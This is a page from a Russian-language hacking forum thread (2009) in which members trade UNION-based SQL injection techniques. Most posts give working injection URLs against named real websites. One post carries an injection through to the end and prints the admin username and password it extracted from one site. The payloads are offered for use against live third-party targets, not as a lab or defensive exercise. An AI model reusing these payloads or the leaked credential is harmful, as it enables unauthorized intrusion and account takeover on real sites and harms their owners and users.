ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 28.02.2009, 18:47
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

ошибаешься, данными можно двигать, так что (учитывая размах в плане версий ) мой вариант эффективнее =)
все-таки вот small example (в виде двух эквивалентных по результатам запросов) к написанному материалу, или просто для тех кто не вкурил в таблицу jokester
вариант 1 алиасы:
Цитата:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*+from+use rs,(select+1,2,3,4,5,6)a
Цитата:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*+from+(se lect+1)b,users,(select+1,2,3,4,5)a
вариант 2:
Цитата:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*,1,2,3,4, 5,6+from+users
Цитата:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+6,users.*, 2,3,4,5,1+from+users
 
Ответить с цитированием

  #62  
Старый 28.02.2009, 19:24
Аватар для cr0w
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780

Репутация: 585
По умолчанию

Цитата:
ошибаешься, данными можно двигать, так что (учитывая размах в плане версий ) мой вариант эффективнее =)
Да, молодец. БХР достается тебе. ((:

p.s. Я предложенный мною способ придумал года полтора назад, после того как в логах одного сайта нашел попытку провести инъекцию вида
Код:
-1+union+select+*,1,2,3,4,5+from+users
У атакующего не получилось вытащить пасс, так как он не додумался "подвигать" выводимые данные, у меня - получилось с помощью вышеописанного способа с алиасами в from'е. Еще тогда я подумал, что должен быть более красивый способ сделать это. Но, по ряду причин, я не догадался использовать запись с "table_name.*" вместо записи вида
Код:
-1+union+select+6,*,2,3,4,5,1+from+users
которая неработоспособна.

Последний раз редактировалось cr0w; 01.03.2009 в 03:33..
 
Ответить с цитированием

  #63  
Старый 12.03.2009, 18:44
Аватар для ReScE11ER
ReScE11ER
Новичок
Регистрация: 03.03.2009
Сообщений: 2
Провел на форуме:
6209

Репутация: -1
По умолчанию

у меня вопрос
через эту ошибку можно что нибудь сделать
Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190

The news article you selected could not be found.
 
Ответить с цитированием

  #64  
Старый 12.03.2009, 19:20
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

Цитата:
у меня вопрос
через эту ошибку можно что нибудь сделать

Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
The news article you selected could not be found.
http://www.globalwaterfoundation.org/
news.php?id=
21+union+select+1,column_name,3+from+information_s chema.columns+WHERE+table_name='COLLATIONS'+limit+ 1,1/*
)
 
Ответить с цитированием

  #65  
Старый 12.03.2009, 19:27
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Ну а если до конца, то:
Код:
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,user_username,user_password),3+from+wma_users+limit+0,1/*
логин/пас:

Код:
too1s:4what
 
Ответить с цитированием

  #66  
Старый 14.03.2009, 08:14
Аватар для shellz[21h]
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию

не получается провести, если в инъекции 2 поля, а в таблице три столбца. То как быть в такой ситуации?
 
Ответить с цитированием

  #67  
Старый 14.03.2009, 12:38
Аватар для Neoveneficus
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию

Цитата:
Сообщение от shellz[21h]  
не получается провести, если в инъекци и 2 поля, а в таблице три столбца. То как быть в такой ситуации?
так
Цитата:
.php?sqlinj=-1+union+select+concat_ws(0x3a,column1,column2,colu mn3),2+from+yourtable
пробелы убирать не забывай
__________________
II venēficus, ī m.
(с лат.) волшебник, чародей

Последний раз редактировалось Neoveneficus; 14.03.2009 в 12:47..
 
Ответить с цитированием

  #68  
Старый 14.03.2009, 12:55
Аватар для shellz[21h]
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию

я про метод подбора полей.
Цитата:
id=1+union+select+*+from+users,(select+1,2,3,4,5,6 )a
у меня всего два поля, т.е. ?id=-1+union+select+1,2+from+users
заведомо знаю, что в таблице 3 поля, user_id,user,passwd.
просто решил проверить технику, но не получается.
--
как я понял, количесво полей не даст, вывисти столбцы(

Последний раз редактировалось shellz[21h]; 14.03.2009 в 14:08..
 
Ответить с цитированием

  #69  
Старый 09.04.2009, 01:32
Аватар для Plaf-di
Plaf-di
Новичок
Регистрация: 23.03.2009
Сообщений: 10
Провел на форуме:
95007

Репутация: -9
По умолчанию

Я наверно задам глупый вопрос но может у кого нибуть есть все команды sql и что они обозначяют???

А ещё лучьше напишите статью в каких случаях какие применять!

зарание спосибо!!!


Да и ещё если ктото будет не против обьеснить пару маментов ( бесплатно ) пастучите пожалусто icq 412264840 ( хотя токие врятли будут )

и за что -5 поставили?

Последний раз редактировалось Plaf-di; 09.04.2009 в 01:58..
 
Ответить с цитированием

  #70  
Старый 11.04.2009, 20:00
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Начни с: http://dev.mysql.com/doc/refman/5.0/en/index.html
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ